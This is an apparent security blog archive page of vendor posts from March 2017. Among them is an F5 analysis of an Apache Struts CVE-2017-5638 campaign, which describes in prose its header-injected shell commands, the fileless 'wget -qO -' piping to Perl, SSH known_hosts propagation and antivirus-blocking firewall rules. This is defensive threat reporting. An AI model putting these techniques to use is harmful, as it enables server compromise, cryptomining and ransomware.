Monthly Archives: March 2017

  • 0

Example architectures for data security and the GDPR

Category : HP Security

The European Union (EU) General Data Protection Regulation (GDPR) is the most significant development in data privacy in decades. Its aim is to protect EU citizens from privacy and data breaches. The regulation comes into effect on 25 May 2018 and imposes heavy fines—up to 4% of annual revenue—on organizations for noncompliance.

While the GDPR mandates a number of measures to protect EU citizen data such as data portability, consent and revocation, age verification, and the right to be forgotten, achieving compliance in large measure comes down to good data security.

The GDPR recommends pseudonymization and encryption as two mechanisms that can be used to protect personally identifiable information (PII). Vast amounts of information exist on what data needs to be protected, though there is very little public knowledge about how an organization can deploy technologies and processes to secure this data.

This paper introduces typical business use cases for applying pseudonymization and encryption, provides an overview of the HPE SecureData core technologies and platform, and then describes architectures and strategies adopted by two of HPE’s customers to secure PII data:

• A large European mobile operator that uses the HPE data protection technologies to protect mobile subscriber information in a Hadoop data lake

• A global card brand and card issuer that leverages data protection to secure data as it is migrated to the cloud and uses the same architecture to protect sensitive customer PII data within its on-premises environment

Example architectures for data security and the GDPR

  • 0

SteelHead CX Completes Common Criteria Certification

Category : Riverbed

It’s been close to a year, but we finally did it!

Riverbed’s SteelHead CX was awarded Common Criteria certification! Specifically, the SteelHead platform has been certified at Evaluation Assurance Level Two Augmented with Flaw Remediation (EAL2+).

What is Common Criteria?

Briefly, it’s an international standard designed to build trust in the security of IT systems. It was originally developed by the governments of Canada, France, Germany, Netherlands, UK, and U.S. The main purpose was to support companies selling technology to government markets and infrastructure providers across the globe to have their products evaluated against one standard and avoid re-evaluation across international markets.

This is big! Why?

Well, for one, when a company claims adherence to a universal set of standards in IT security, such requirements provide the customer confidence in making informed security decisions.

We all know security continues to become increasingly challenging as a result of today’s innovations in cloud computing and collaboration. These capabilities offer many operational efficiencies, but they also create additional risks to the network. Many nations have collaborated to provide assurance of a basic level of security for networking equipment. The Common Criteria certification serves this purpose.

Additionally, you, as a customer, can rely on this certification since SteelHead has been tested by an independent lab and not performed by us, the vendor. In addition, along with the available SteelHead Security Technical Implementation Guide (STIG) and FIPS140-2 certification, this enables customers, including the Defense Information Systems Agency (DISA) and the Department of Defense (DOD), to purchase and deploy SteelHead CX, as it validates the product’s quality assurance, functionality, and security levels.

To learn more about Common Criteria and how it can benefit your organization, go to Navigate to Certified Products to download SteelHead’s certification report.

  • 0

Reactive Isn’t Working

Category : McAfee

This video featuring Dr. Stephenson, Technology Editor, SC Magazine, and Chris Cardran, Enterprise Technology Architect, Intel Security, explores how threat intelligence sharing and crowdsourcing can strengthen defenses and minimize impacts from zero day vulnerabilities by applying diversity in analysis, context and situational awareness to detect and correct threats.

  • 0

FireEye & Belden: Protecting ICS with Enterprise and Industrial Security

Category : FireEye

Industrial Control Systems are increasingly open to attacks as the industrial internet of things grows and more systems are exposed to open networks. FireEye and Belden are working together to help mitigate the impact of attacks against critical infrastructures around the globe.

  • 0

SWIFT Security Concerns Resurface

Category : Cyber-Ark

The Bangladesh Bank heist has resurfaced as reports around a potential perpetrator make headlines. The recent focus may be on who and why, but lessons should be learned from what happened – it’s important to recognize common attack patterns and understand the role of privileged accounts.

As a recap: last year, cyber criminals embezzled money from the Bangladesh Central Bank. Using stolen privileged credentials, they moved laterally throughout the environment until they reached SWIFT, a financial services co-op that provides a secure network through which banks can send and receive monetary transactions. Using these privileged credentials, the criminals ultimately ordered a total of 35 transactions worth $951 million through the SWIFTNet systems. From there, approximately $81 million was transferred before a spelling error raised suspicion that led to the discovery of the breach. (Watch a short video for a brief overview of the attack path.) This was a high profile attack, but this was not the only bank as noted in a Reuters article.

Lessons learned from the breach and how you can protect your organization:

  • SWIFT Vulnerabilities: Many industry experts have pointed out vulnerabilities in SWIFT, noting that the system has likely not seen its last “bank robbery.” In this CSO article, Lavi Lazarovitz, CyberArk Labs cyber research team leader, explains that attackers are “getting really good at gaining that all important initial foothold inside networks by using attacks such as spear phishing.” With that foothold, they can gain local administrator privileges using, for example, an exploited Acrobat Reader vulnerability; when a user simply opens a malicious PDF file, the file runs malicious code that in turn acquires those elevated privileges.
  • Best Practices to Shore up Privileged Account Security: The Bangladesh Bank attack is yet another example of how attackers covet, seek out and exploit privileged accounts to achieve their mission. While this attack had a serious outcome and required advanced planning, the attack methods used were not very sophisticated. In a post-mortem analysis of the attack, CyberArk security researcher Asaf Hecht outlines five best practices that would have likely mitigated the breach.
  • How Banks Mitigate Risk: The threat is real and present. Many major banks recognize this and have taken steps to prioritize privilege in the wake of this breach. This American Banker article describes how a $26.9 billion-asset bank uses CyberArk to lock down privileged accounts and monitor and analyze privilege account activity.

Want to learn more? Attend a webcast on March 28, 2017 at 2 pm ET. CyberArk Labs will address the cyber security lessons learned related to the heist. Register here.

  • 0

Instant Desktop Computing, From the New Samsung Galaxy S8 Smartphone

Category : Citrix

Today, at Galaxy UNPACKED 2017 at Lincoln Center in New York, Samsung launched the Galaxy S8 smartphone. It’s big news that’s spreading fast across social media.

So, you might ask, what’s the big deal in the eyes of Citrix?

Citrix runs on any device—desktop, laptop, Chromebook, thin client, tablet, smartphone—so everyone expects the S8 will be another one of the 1,000+ Citrix Ready endpoints to choose from.

What’s not expected is another part of their big unveiling today…

Samsung announced the Desktop Experience (DeX), which enables the S8 to operate as a full-functioning Windows desktop. Just pop the phone into a new Samsung DeX docking station, connect a monitor, keyboard, and mouse… and you have a powerful desktop computer.

And not just any desktop computer—your desktop.

How? With secure access to all your business applications and data to be productive from any work location using your dual-purpose S8. I’m not talking about running lightweight, rudimentary apps that allow you to “get by” during an unplanned work-from-home day. I’m talking resource-intensive, graphically rich, enterprise-grade apps—2D and 3D apps that likely would be impossible to run on computers purchased even just a few years ago.

samsung DeX

There’s Only One Way To Do This

The only way to use applications on a smartphone that are designed to run on a computer is through desktop virtualization (VDI), which means the apps are installed and run in a datacenter or trusted cloud and securely accessed remotely by workers. And the only way to ensure that this remoting experience looks and feels like a native desktop—across long distances and varying network conditions—is to use Citrix Workspace products and services.

That’s why Citrix is Samsung’s preferred partner for delivering a next-generation mobile workspace experience through DeX. Our market-leading technologies—XenApp, XenDesktop, XenMobile, ShareFile and NetScaler—power secure mobile workspaces and the future of work.

Together, Citrix and Samsung can deliver a next-generation mobile desktop experience that has the potential to disrupt the market and better support today’s modern workstyles.

Fewer computers for businesses to purchase and refresh. A more secure, yet flexible, computing environment for admins to manage. Fewer devices for workers to tote around.

And THAT is a big deal.

  • 0

Effective Security for Today’s Threats

Category : Cisco

Security that’s effective, automated and integrated.

Intrusion detection and prevention remains a powerful defense strategy – and Cisco is recognized as a Leader by Gartner. Security innovation, integration with our Advanced Malware Protection (AMP) and the Cisco network and strong customer support let Cisco NGIPS deliver the effective, automated, and integrated security customers need against the latest threats. Download the latest Gartner Magic Quadrant for IDPS.


This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from Cisco.

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

  • 0

From DDoS to Server Ransomware: APACHE STRUTS 2 – CVE-2017-5638 Campaign

Category : F5

A common infection vector used by botnet creators is scanning the Internet for web vulnerabilities to exploit for malware or back doors. The advantage of hitting servers over personal consumer devices is the ability to leverage powerful hardware that is always online and has high bandwidth. Also, many servers do not have anti-virus solutions in place.

As soon as a zero-day remote code execution vulnerability is disclosed, it is common to see many scans in the wild. Some of these scans are researchers, but many of them are hostile exploit attempts. Following the disclosure of “Jakarta Multipart Parser” vulnerability in APACHE STRUTS 2 (CVE-2017-5638)1, F5 researchers observed around 10 different campaigns in the wild. One in particular caught our eye.

This campaign started on the 10th of March, 2017 a couple of days after the vulnerability was disclosed. While it looked similar to the other CVE-2017-5638 campaigns, the attack vector seemed to be a slight modification of the original public exploit2.

Figure 1: CVE-2017-5638 campaign

The exploit triggers the vulnerability via the Content-Type header value, which the attacker customized with shell commands to be executed if the server is vulnerable.

In the first days of this campaign, shell commands were observed to infect the machine with the “PowerBot” malware, which is written in PERL, and uses DDoS as its main functionality (also known as the PerlBot or Shellbot).

The typical infection tactic for the most commonly observed threat actors, who scan the Internet for web vulnerabilities as their attack strategy, has been to execute commands in several steps: downloading the malware from a remote server, setting it as executable (in the case of binary file), running the malware, and removing the initial infection file.

Conventionally, attack payloads have relied on already installed programs on the target server to download the malware, such as wget and curl. In this campaign, the attacker also leverages the less common “fetch” program as well as a special mode of the “wget”. By using the “wget –qO –“ options, the malware file is downloaded but is not actually written to a file on the disk. Instead, the content is redirected to the Perl interpreter for execution, minimizing the local detectable footprint.

Once the bot is in place, the infected server will connect to an IRC channel to retrieve commands from the botnet master, as shown in Figures 2 and 3. While joining the IRC, F5 researchers observed that the botnet has more than 2,500 victims at the time of this writing, including production servers. And this number is just for a single IRC channel.

Figure 2: IRC channel consists more than 2,500 bots phoning home

By randomly exploring some of the names and IP addresses of the infected hosts connected to the channel, we could find production servers and servers hosted on the AWS infrastructure.

Figure 3: Example of infected machines connected to the IRC channel
From DDoS to Crypto Currency Mining

Several days after the beginning of the observed campaign, F5 researchers started seeing a variation of the same campaign. The payload switched from Perl to Bash scripting, but this turned out to be just a spearhead to deploy two different types of malware. The spearhead exploit downloads and executes the same PERL bot.

Figure 4: Downloading and running PERL bot

However, this time, a “minerd” crypto coin mining program will be downloaded as well with all of its prerequisites. The attacker masquerades the malicious process and its configuration with names similar to Apache server, to make it look more innocent when the infected user will list all the running processes.

Figure 5: Downloading “minerd” and its configuration

The bot will then mine coins into several legitimate crypto pools, as shown in the configuration file in Figure 6.

Figure 6: “minerd” configuration file

These cryptocoin pools appear to be hosted in France under the “” domain name, as shown in Figure 7.

Figure 7: Mining host in France in the Online SAS network

One of the more fascinating aspects of this malware was the creative technique that the spearhead exploit uses to propagate itself. It will search for all the remote IP addresses that the administrator of the server was connecting to on this server. It searches the SSH “known_hosts” file, which keeps the IP addresses and fingerprints of all the servers to which the administrator was connecting. It also scans the Bash history file for any IP addresses used within the SSH command. Once this list of IP addresses is compiled, the script tries to connect to them via SSH. If the configured authentication was set up to use a key file instead of a username and password, the malware will successfully deploy itself on the remote machine.

Figure 8: Malware propagating to other known servers
The ShellShock Connection

In general, threat actors love new zero-days as an opportunity to recycle their campaigns. One of the IP addresses in this campaign originates from Hong Kong, as shown in Figure 9; this address was known before to use the notorious ShellShock (CVE-2014-6271) to deliver similar payloads.

Figure 9: Attacking host in Hong Kong on the Wharf T&T network.

F5 researchers noted that the malware file names have stayed the same – “.mailer” and “a” as shown in Figure 10 and 11. However, the crypto mining pool and the account have been changed, as shown in Figure 12.

Figure 10: ShellShock exploit delivers “.mail” PERL PowerBot
Figure 11: ShellShock exploit delivers “a” spearhead bash script
Figure 12: Crypto currency miner configuration
Expanding to Server Ransomware

Delivering Linux DDoS malware by exploiting web vulnerabilities is commonly observed in the wild, and server ransomware seems to be one of the emerging trends starting from the last year.

The same attacker (surprisingly using the same IP address) behind the previously described Apache STRUTS campaign varied the campaign again during the week of March 20th. This time, the payload infected Windows machines with the “Cerber” ransomware.

The structure of the Jakarta Multipart parser exploit is identical to the attack that was used to deliver previous payloads. However, the current executed shell commands run the Windows BITSAdmin and ftp command line tools (which ship with every Windows server) to download and run the file “1.exe”, as shown in Figure 13.

Figure 13: APACHE STRUTS exploit delivering Windows ransomware

Once running, the malware encrypts the files and shows an image with a ransom message, as shown in Figure 14.

Figure 14: Ransom message once infected

As per the usual ransomware methods, the victim is given instructions on how to pay the ransom to get their files back, as shown in Figure 15.

Figure 15: Ransom payout instructions

F5 researchers analyzed this malware variant and found the author added a functionality of modifying Windows firewall rules to block communication from installed anti-virus software to the world, thus preventing updates and reporting. The specific rules are shown in Figure 16.

Figure 16: Ransomware blocks Windows Defender

To find the installed security products, the malware first runs WMI queries on the “AntiSpywareProduct” and “FirewallProduct” classes.

Figure 17: WMI queries to get the list of installed security products

Then it traverses through files and folders resulted from the query, and adds them to a firewall rule if they are executables.

Figure 18: Adding firewall rules to block security products communication
The Attackers’ Payday

The attackers running this campaign are using the same Bitcoin ID for a number of campaigns.

Figure 19: Bitcoin account located in malware configuration

This particular account has processed 84 bitcoins, which translates to roughly $86,000 USD at current market value (bitcoin value fluctuates slightly day to day). Since the Struts exploit has become publicly available, we observed 2.2 bitcoins going in and out of this wallet, worth roughly $2,300 USD.

Figure 20: Bitcoin transactions for the malware account
Last Word

As we have seen in the past, it is amazing how fast existing threat actors using older web vulnerabilities in their campaigns can adapt to switch to newly released zero-days to deliver the same payloads. This gives them a new vulnerability window to exploit while the defenders install patches.

The new vulnerability in Apache STRUTS provides a target-rich environment for threat actors to extend their business while infecting thousands of new servers. Targeting servers, rather than individuals, with ransomware has better chances for monetization because those are usually run by organizations with deeper pockets and better infrastructure that might be critical for their business.

In this article we have analyzed only a single campaign targeting Apache STRUTS. There are around 10 additional ones, most of which are reconnaissance, while others deliver traditional Linux DDoS malware.

  • 0

Demo of WhatsApp Web Account Takeover

Category : Check Point

A vulnerability has been discovered in WhatsApp Web. This vulnerability, if exploited, would allow attackers to completely take over users’ accounts on any browser, and access victims’ personal and group conversations, photos, videos and other shared files, contact lists, and more. This means that attackers could potentially download photos and or post them online, send messages on the victim’s behalf, demand ransom, and even take over the victim’s friends’ accounts.

The exploitation of this vulnerability starts with the attacker sending an innocent looking file to the victim, which contains malicious code. The file can be modified to contain attractive content and raise the chances a user will open it. Once the user clicks to open it, the malicious file allows the attacker to access WhatsApp’s local storage, where user data is stored. From that point, the attacker can gain full access to the user’s account and account data. The attacker can then send the malicious file to the all victim’s contacts, opening a dangerous door to a potentially widespread attack over the WhatsApp network.

  • 0

Secure Access Solutions for Mobile, Cloud, and Internet of Things

Category : Pulse Secure

Tuesday, April 11, 2017 | 8:00-9:00am PST / 11:00-12:00pm EST

Embrace the latest cloud, mobile and IoT technologies with Secure Access. Learn how Pulse Secure’s latest features and capabilities make it simple to securely roll out new end-user services to support the latest IT transformation without compromising security compliance or taxing your IT team.

Last year we delivered over 250 new product features. Learn about the latest features in:

  • Connect Secure 8.3r1
  • Policy Secure 5.4r1
  • Pulse Client 5.3r1

All are now available in Pulse Access Suite which makes planning, purchasing and deploying a snap. We’ve assembled our product owners to tell you what’s new, so be sure to join and drill down with the experts.

Register now